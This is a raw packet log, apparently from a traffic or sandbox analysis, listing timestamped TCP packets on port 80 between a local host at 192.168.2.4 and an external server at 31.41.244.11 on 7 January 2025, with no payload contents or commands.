Jan 7, 2025 10:09:05.445450068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445461035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445503950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445548058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445625067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445636988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445652008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445683956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445710897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445800066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445812941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445825100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445836067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445847988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445858955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445879936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445879936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445904016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.445956945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445971012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445983887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.445998907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446011066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446021080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446029902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446033955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446047068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446053982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446058035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446073055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446074963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446096897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446096897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446105957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446151018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446151018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446273088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446284056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446295977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446306944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446321011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446331978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446343899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.446372986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446372986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.446420908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.447670937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447683096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447695971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447705984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447716951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447765112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.447823048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.447824955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447839022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447853088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447864056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447909117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.447909117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.447974920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447987080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.447997093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448046923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448165894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448179007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448189974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448230028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448268890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448282957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448296070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448365927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448379040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448390961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448431969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448431969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448502064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448514938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448525906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448535919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448548079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448556900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448570013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448579073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448579073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448594093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448641062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448681116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448693991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448704004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448714018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448724031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448734999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448771000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448771000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448817968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448829889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448841095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448851109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448879957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448903084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448908091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448920012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448929071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448940039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448945045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448951006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.448951006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448951006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448961973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.448971987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449014902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.449014902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.449197054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449208021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449218988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449229002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449239969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449251890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449273109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.449295998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.449295998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.449347019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.449448109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480370998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480382919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480402946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480413914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480426073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480432034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480458975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480509996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480520964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480521917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480535030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480545998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480557919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480571032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480573893 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480582952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480592966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480597019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480614901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480655909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480660915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480668068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480681896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480698109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480712891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480724096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.480725050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480725050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480762959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.480762959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.481133938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.481215954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.501322031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501339912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501352072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501363039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501375914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501384020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.501389027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501401901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.501432896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.501486063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.531836987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531851053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531877041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531894922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531922102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531934023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531951904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531955957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.531986952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.531997919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532005072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532005072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532042027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532042027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532071114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532083035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532093048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532113075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532140970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532151937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532154083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532182932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532200098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532210112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532212973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532224894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532234907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532252073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532264948 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532279968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532284021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532295942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532315016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532335997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532337904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532347918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532360077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532381058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532404900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532427073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532438993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532449961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532464981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532474041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532500982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532512903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532524109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532522917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532522917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532536983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532568932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532593966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532625914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532639980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532650948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.532694101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.532694101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534203053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534214020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534226894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534252882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534261942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534267902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534270048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534280062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534307957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534331083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534332991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534343004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534368038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534384012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534400940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534406900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534424067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534434080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534442902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534442902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534445047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534456968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534481049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534481049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534492970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534524918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534527063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534535885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534543037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534548044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534557104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534594059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534594059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534599066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534612894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534621954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534631968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534670115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534722090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534733057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534744024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534761906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534775972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534782887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534792900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534804106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534811020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534833908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534837008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534847021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534857035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534861088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534868002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534887075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534893990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534930944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534933090 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534933090 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.534943104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.534954071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535001993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535001993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535008907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535104036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535116911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535126925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535135984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535146952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535157919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535166979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535168886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535180092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535196066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535207033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535218000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.535227060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535242081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.535299063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.566827059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566838026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566847086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566871881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566880941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566890955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566900969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.566920042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.566972017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567009926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567020893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567028999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567039967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567065001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567065001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567104101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567114115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567120075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567125082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567137003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567147970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567157984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567205906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567259073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567270994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567281008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567290068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567300081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.567320108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567342997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.567342997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.585854053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585871935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585901022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585911989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585922003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585956097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585966110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.585974932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.585974932 CET	80	50017	31.41.244.11	192.168.2.4
